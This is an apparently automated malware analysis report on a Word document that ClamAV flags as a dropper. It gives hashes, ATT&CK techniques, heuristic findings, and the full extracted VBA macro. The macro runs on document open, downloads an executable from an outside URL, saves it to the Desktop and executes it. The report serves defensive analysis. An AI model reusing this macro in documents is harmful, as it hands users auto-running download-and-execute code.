Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 96368f59d08f0cee…

MALICIOUS

Office (OOXML)

17.1 KB Created: 2021-05-10 19:12:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-05-22
MD5: c95983159aeb51218f6ebc9e0d72173f SHA-1: 82272e71e39c2acf83afca746b9fb77bb000ca0a SHA-256: 96368f59d08f0ceed5447e2ec69f9d97300ac143ff214caeafdd482552f5a0b0
410 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample is a malicious Office document containing a VBA macro that executes upon opening. The macro uses WScript.Shell to download a file from "https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe" and saves it as putty.exe to the user's desktop. It then attempts to execute this downloaded file.

Heuristics 9

  • ClamAV: Doc.Dropper.Agent-6412232-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6412232-1
  • VBA project inside OOXML medium 6 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell (fn)
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set w7cd8bf5d206ed7376ad9258991640d8a = CreateObject("WScript.Shell")
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
    t76f7b882ef9f8345055092fb8adab669 = HttpReq.responseBody
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set HttpReq = CreateObject("Microsoft.XMLHTTP")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexReferenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/inkReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2017/model3dReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2018/wordml/cexReferenced by macro
    • http://schemas.microsoft.com/office/word/2016/wordml/cidReferenced by macro
    • http://schemas.microsoft.com/office/word/2018/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro
    • https://the.earth.li/~sgtatham/putty/latest/w64/putty.exeReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1694 bytes
SHA-256: ab53efeecd235fb898dbd8758a3469870005f0915e0b3c724ebf66d2583c49ec
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
b6d3120e527e4602a76e8e07d70adfe28
End Sub

Attribute VB_Name = "Module1"
Sub b6d3120e527e4602a76e8e07d70adfe28()
Call bfcbd99190f48dbf11a1ddef167d3ce55
fn = nf9cb78f12da60987fa73d59ef40e1c1e() & "\putty.exe"
Shell (fn)
End Sub
Sub bfcbd99190f48dbf11a1ddef167d3ce55()
Dim t76f7b882ef9f8345055092fb8adab669 As String
t76f7b882ef9f8345055092fb8adab669 = "https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe"
fn = nf9cb78f12da60987fa73d59ef40e1c1e() & "\putty.exe"
Dim HttpReq As Object
Set HttpReq = CreateObject("Microsoft.XMLHTTP")
HttpReq.Open "GET", t76f7b882ef9f8345055092fb8adab669, False
HttpReq.send
t76f7b882ef9f8345055092fb8adab669 = HttpReq.responseBody
If HttpReq.Status = 200 Then
Set y3f1122a33d61a1ea76faea11d53c31b8 = CreateObject("ADODB.Stream")
y3f1122a33d61a1ea76faea11d53c31b8.Open
y3f1122a33d61a1ea76faea11d53c31b8.Type = 1
y3f1122a33d61a1ea76faea11d53c31b8.Write HttpReq.responseBody
y3f1122a33d61a1ea76faea11d53c31b8.SaveToFile fn, 2
y3f1122a33d61a1ea76faea11d53c31b8.Close
End If
End Sub
Function nf9cb78f12da60987fa73d59ef40e1c1e() As String
Dim w7cd8bf5d206ed7376ad9258991640d8a As Object
Set w7cd8bf5d206ed7376ad9258991640d8a = CreateObject("WScript.Shell")
nf9cb78f12da60987fa73d59ef40e1c1e = w7cd8bf5d206ed7376ad9258991640d8a.SpecialFolders("Desktop")
Set w7cd8bf5d206ed7376ad9258991640d8a = Nothing
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 11776 bytes
SHA-256: 27bf420b0945ad701673c5b2f8c1ee62e6d6ad18b48d0b8ae80d3ea7d67f42d5
Detection
ClamAV: Doc.Dropper.Agent-6412232-1
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.